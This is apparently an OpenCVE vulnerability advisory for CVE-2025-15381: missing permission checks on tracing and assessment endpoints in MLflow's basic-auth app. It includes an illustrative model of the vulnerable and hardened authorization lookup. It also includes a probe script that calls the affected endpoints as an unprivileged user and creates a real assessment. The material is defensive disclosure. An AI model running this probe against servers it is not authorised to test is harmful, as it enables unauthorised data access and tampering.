Description
In the latest version of mlflow/mlflow, when the `basic-auth` app is enabled, tracing and assessment endpoints are not protected by permission validators. This allows any authenticated user, including those with `NO_PERMISSIONS` on the experiment, to read trace information and create assessments for traces they should not have access to. This vulnerability impacts confidentiality by exposing trace metadata and integrity by allowing unauthorized creation of assessments. Deployments using `mlflow server --app-name=basic-auth` are affected.
Published: 2026-03-27
Score: 8.1 High
EPSS: < 1% Very Low
KEV: No
Impact: Confidentiality and Integrity
Action: Immediate Patch
AI Analysis

Impact

With the MLflow server running the basic‑auth app, the permission validators that gate the other experiment‑scoped endpoints are not applied to the tracing and assessment endpoints. Any account that can log in, including one holding `NO_PERMISSIONS` on the experiment, can therefore read trace information from experiments it is not allowed to see and create assessments on those traces. The first leaks data the permission model was meant to hide; the second lets an attacker plant forged assessment results and mislead whatever consumes them downstream, such as analytics or trace search.
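The mechanism is the classic CWE-425 gap: an authorization layer that checks only the routes it knows about, so a route added later without a validator entry is served to every authenticated user. The Python model below is an added illustration, not MLflow's code; its route table, URL paths, sample users and the rule that creating an assessment needs EDIT are all assumptions made for the example. It shows the vulnerable lookup beside a hardened one that maps the trace routes and fails closed for any API route that has no validator.

```python
import re
from dataclasses import dataclass, field

# Permission levels, lowest to highest; list order gives "at least" comparisons.
LEVELS = ["NO_PERMISSIONS", "READ", "EDIT", "MANAGE"]

# Constructed sample data for the illustration: experiment "7" is readable by
# alice only, bob is explicitly denied, and trace "tr-abc" belongs to it.
EXPERIMENT_PERMISSIONS = {("alice", "7"): "READ", ("bob", "7"): "NO_PERMISSIONS"}
TRACE_EXPERIMENT = {"tr-abc": "7"}

API_PREFIX = "/api/2.0/mlflow/"           # assumed prefix, as are all paths below
TRACE_ID_RE = re.compile(r"/traces/([^/]+)")


@dataclass
class Request:
    user: str
    method: str
    path: str
    params: dict = field(default_factory=dict)


def has_at_least(user, experiment_id, needed):
    """True if `user` holds `needed` or a higher level on `experiment_id`."""
    held = EXPERIMENT_PERMISSIONS.get((user, experiment_id), "NO_PERMISSIONS")
    return LEVELS.index(held) >= LEVELS.index(needed)


def trace_experiment(path):
    """Experiment owning the trace named in the URL, or None if unknown."""
    m = TRACE_ID_RE.search(path)
    return TRACE_EXPERIMENT.get(m.group(1)) if m else None


# Validators return True when the caller may proceed.
def validate_can_read_experiment(req):
    return has_at_least(req.user, req.params.get("experiment_id"), "READ")


def validate_can_read_trace(req):
    exp = trace_experiment(req.path)
    return exp is not None and has_at_least(req.user, exp, "READ")


def validate_can_assess_trace(req):
    # Assumption of this model: creating an assessment needs EDIT on the experiment.
    exp = trace_experiment(req.path)
    return exp is not None and has_at_least(req.user, exp, "EDIT")


# Vulnerable table: the experiment route is registered, but the (hypothetical)
# trace and assessment routes were added to the server without an entry here.
VULNERABLE_VALIDATORS = {
    ("GET", re.compile(r"^/api/2\.0/mlflow/experiments/get$")): validate_can_read_experiment,
}

# Hardened table: every sensitive route is mapped to a validator.
HARDENED_VALIDATORS = {
    **VULNERABLE_VALIDATORS,
    ("GET", re.compile(r"^/api/2\.0/mlflow/traces/[^/]+/info$")): validate_can_read_trace,
    ("POST", re.compile(r"^/api/2\.0/mlflow/traces/[^/]+/assessments$")): validate_can_assess_trace,
}


def find_validator(table, req):
    for (method, pattern), validator in table.items():
        if method == req.method and pattern.match(req.path):
            return validator
    return None


def before_request_vulnerable(req):
    """Status the auth layer produces: 200 lets the request through, 403 blocks it."""
    validator = find_validator(VULNERABLE_VALIDATORS, req)
    if validator is None:
        return 200                      # CWE-425: unmapped route, no check at all
    return 200 if validator(req) else 403


def before_request_hardened(req):
    validator = find_validator(HARDENED_VALIDATORS, req)
    if validator is None:
        # Fail closed: an API route with no registered validator is a bug, not a
        # public endpoint. Routes that truly need no experiment permission must
        # be mapped to an explicit allow validator instead of falling through.
        return 403 if req.path.startswith(API_PREFIX) else 200
    return 200 if validator(req) else 403
```

The fix has two parts, and the second matters more: registering the missing routes closes this particular hole, while failing closed on unmapped API routes stops the next endpoint added to the server from reopening it.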

Affected Systems

The flaw affects MLflow tracking servers started with the basic‑auth app, i.e. `mlflow server --app-name=basic-auth`; a server run without that app has no permission model for this bug to bypass and is outside the scope of this advisory. The advisory reports the issue against the latest version at the time of disclosure and names no fixed version, so treat every release that ships the basic‑auth app as affected until a vendor fix appears.

Risk and Exploitability

The CVSS 3.1 vector AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N gives a score of 8.1 (High): reachable over the network with low complexity and no user interaction, high confidentiality and integrity impact, no availability impact. The EPSS score is below 1 %, so widespread exploitation is currently judged unlikely, and the CVE is not listed in the CISA KEV catalog, although the SSVC record marks Exploitation as 'poc', meaning a proof of concept is available. The only prerequisite is a valid account on the MLflow instance; no elevated role is needed, because the affected endpoints consult no experiment permission at all, so any user who can log in can call them directly.

Generated by OpenCVE AI on March 31, 2026 at 05:27 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Disable the basic‑auth app unless it is essential for your deployment.
  • Upgrade to a version of MLflow where tracing and assessment endpoints enforce permission validation, or apply any vendor‑issued patch.
  • Limit who can authenticate at all: experiment‑level permissions do not gate the affected endpoints, so an account holding `NO_PERMISSIONS` on every experiment can still reach them. Keep per‑experiment permissions tight for the endpoints that do enforce them.
  • Verify whether a server is affected by calling a trace‑read and an assessment‑create endpoint as a user that holds `NO_PERMISSIONS` on the experiment that owns the trace; a 200 where a 403 is expected confirms the bypass.
  • Monitor logs for abnormal tracing or assessment activity and apply remediation immediately if unauthorized actions are detected.
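To carry out the verification step in the list above, here is an added probe script; it is not from OpenCVE or MLflow. It logs in with HTTP basic auth as an account that holds `NO_PERMISSIONS` on the experiment owning a test trace and calls a trace‑read and an assessment‑create endpoint; a 200 from either shows the permission check is missing. The two route templates and the assessment request body are assumptions: set them to the endpoints and schema of the MLflow version you run, and note that on a vulnerable server the POST really creates an assessment, so point it at a throwaway trace.

```python
import base64
import json
import sys
import urllib.error
import urllib.request

# Hypothetical route templates: replace with the trace-info and
# create-assessment routes of the MLflow version you run.
READ_TRACE_PATH = "/api/2.0/mlflow/traces/{trace_id}/info"
CREATE_ASSESSMENT_PATH = "/api/2.0/mlflow/traces/{trace_id}/assessments"


def basic_auth_header(user, password):
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return {"Authorization": f"Basic {token}"}


def urllib_transport(method, url, headers, body):
    """Send one request and return the HTTP status code (error responses included)."""
    data = json.dumps(body).encode() if body is not None else None
    req = urllib.request.Request(url, data=data, method=method,
                                 headers={**headers, "Content-Type": "application/json"})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def classify(status):
    """Map a status code to a verdict about the permission check."""
    if status == 200:
        return "VULNERABLE"                 # low-privilege user was served
    if status == 403:
        return "PROTECTED"                  # a permission validator rejected the call
    if status == 401:
        return "AUTH_FAILED"                # credentials wrong; the check was never reached
    return f"INCONCLUSIVE ({status})"       # e.g. 404 wrong path/trace, 400 wrong body schema


def probe(base_url, user, password, trace_id,
          read_path=READ_TRACE_PATH, assess_path=CREATE_ASSESSMENT_PATH,
          transport=urllib_transport):
    """Probe both endpoints as `user`, who must hold NO_PERMISSIONS on the
    experiment that owns `trace_id`. Returns a verdict per endpoint."""
    headers = basic_auth_header(user, password)
    base = base_url.rstrip("/")
    verdicts = {}
    verdicts["read_trace"] = classify(
        transport("GET", base + read_path.format(trace_id=trace_id), headers, None))
    # Assumed request body; the real assessment schema is version specific.
    # On a vulnerable server this call really creates an assessment.
    body = {"name": "cve-2025-15381-probe", "value": "probe"}
    verdicts["create_assessment"] = classify(
        transport("POST", base + assess_path.format(trace_id=trace_id), headers, body))
    return verdicts


if __name__ == "__main__":
    if len(sys.argv) != 5:
        sys.exit("usage: probe.py http://mlflow-host:5000 lowpriv-user password trace-id")
    print(json.dumps(probe(*sys.argv[1:5]), indent=2))
```

Read a 403 as the check being present, a 401 as a credentials problem rather than a result, and a 404 or 400 as a wrong path, trace id or body schema; only a 200 proves the bypass. The transport is injectable so the classification logic can be exercised without a live server.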

Advisories
Source | ID | Title
GitHub GHSA | GHSA-g6pg-52vf-843h | MLFlow allows Tracing + Assessments Access
History

Tue, 31 Mar 2026 03:00:00 +0000

Type | Values Removed | Values Added
Weaknesses | | CWE-425
References | |
Metrics | threat_severity: None | cvssV3_1: {'score': 8.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}; threat_severity: Important


Mon, 30 Mar 2026 07:15:00 +0000

Type | Values Removed | Values Added
First Time appeared | | Mlflow; Mlflow mlflow/mlflow
Vendors & Products | | Mlflow; Mlflow mlflow/mlflow

Fri, 27 Mar 2026 20:15:00 +0000

Type | Values Removed | Values Added
Metrics | | ssvc: {'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'total'}, 'version': '2.0.3'}


Fri, 27 Mar 2026 16:45:00 +0000

Type | Values Removed | Values Added
Description | | (the text shown under Description at the top of this page)
Title | | Unauthorized Access to Tracing and Assessment Endpoints in mlflow/mlflow
Weaknesses | | CWE-200
References | |
Metrics | | cvssV3_0: {'score': 8.1, 'vector': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}


MITRE

Status: PUBLISHED

Assigner: @huntr_ai

Published:

Updated: 2026-03-28T03:55:49.775Z

Reserved: 2025-12-30T21:47:03.954Z

Link: CVE-2025-15381

Vulnrichment

Updated: 2026-03-27T16:59:04.315Z

NVD

Status : Awaiting Analysis

Published: 2026-03-27T17:16:26.573

Modified: 2026-03-30T13:26:29.793

Link: CVE-2025-15381

Redhat

Severity : Important

Public Date: 2026-03-27T16:17:30Z

Links: CVE-2025-15381 - Bugzilla

OpenCVE Enrichment

Updated: 2026-03-31T20:01:03Z

Weaknesses